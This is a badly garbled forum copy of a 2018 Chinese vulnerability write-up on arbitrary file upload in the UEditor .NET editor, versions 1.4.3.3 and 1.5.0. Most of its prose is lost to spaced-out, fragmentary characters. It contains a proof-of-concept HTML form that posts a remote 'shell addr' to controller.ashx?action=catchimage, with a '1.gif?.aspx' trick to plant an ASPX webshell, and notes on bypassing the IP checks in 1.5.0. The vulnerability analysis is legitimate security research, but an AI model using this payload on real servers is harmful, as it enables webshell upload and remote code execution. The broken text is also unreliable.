[2087] 2018-08-22_UEditor编辑器两个版本任意文件上传漏洞分析

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-16
2018-08-22_UEditor编辑器两个版本任意文件上传漏洞分析 U E d i t o r I v a n   d o t N e t   2 0 1 8 - 0 8 - 2 2 0 x 0 1   U E d i t o r 广 W E B 使 . N E T 0 x 0 2   1 . 4 . 3 . 3   h t t p : / / u e d i t o r . b a i d u . c o m / w e b s i t e / d o w n l o a d . h t m l h t m l e n c t y p e   m u l t i p a r t / f o r m - d a t a     p o c p o c < f o r m   a c t i o n = " h t t p : / / x x x x x x x x x / c o n t r o l l e r . a s h x ? a c t i o n = c a t c h i m a g e " e n c t y p e = " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d "     m e t h o d = " P O S T " >     < p > s h e l l   a d d r : < i n p u t   t y p e = " t e x t "   n a m e = " s o u r c e [ ] "   / > < / p   >     < i n p u t t y p e = " s u b m i t "   v a l u e = " S u b m i t "   / > < / f o r m > s h e l l   1 . g i f ? . a s p x w e b s h e l l
0 x 0 3   I I S 访 c o n t r o l l e r . a s h x   u p l o a d i m a g e u p l o a d s c r a w l u p l o a d v i d e o u p l o a d f i l e c a t c h i m a g e 访 c a t c h i m a g e C r a w l e r H a n d l e r
s o u r c e [ ]     C r a w l e r s   =   S o u r c e s . S e l e c t ( x = >   n e w   C r a w l e r ( x ,   S e r v e r ) . F e t c h ( ) ) . T o A r r a y ( ) ;   l a m b d a   F e c t h I s E x t e r n a l I P A d d r e s s D N S
  1 . 5 . 0 h t t p s : / / g i t h u b . c o m / f e x - t e a m / u e d i t o r / b l o b / d e v - 1 . 5 . 0 / n e t / A p p _ C o d e / C r a w l e r H a n d l e r . c s 1 . 4 . 3 . 3 1 . 5 . 0 i p e x p 1 . 5 . 0 1 . 4 . 3 . 3     C o n t e n t T y p e p h p g i f 8 9
R C E 0 x 0 4   1 .       C r a w l e r H a n d l e r . c s   2 .       I P S
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则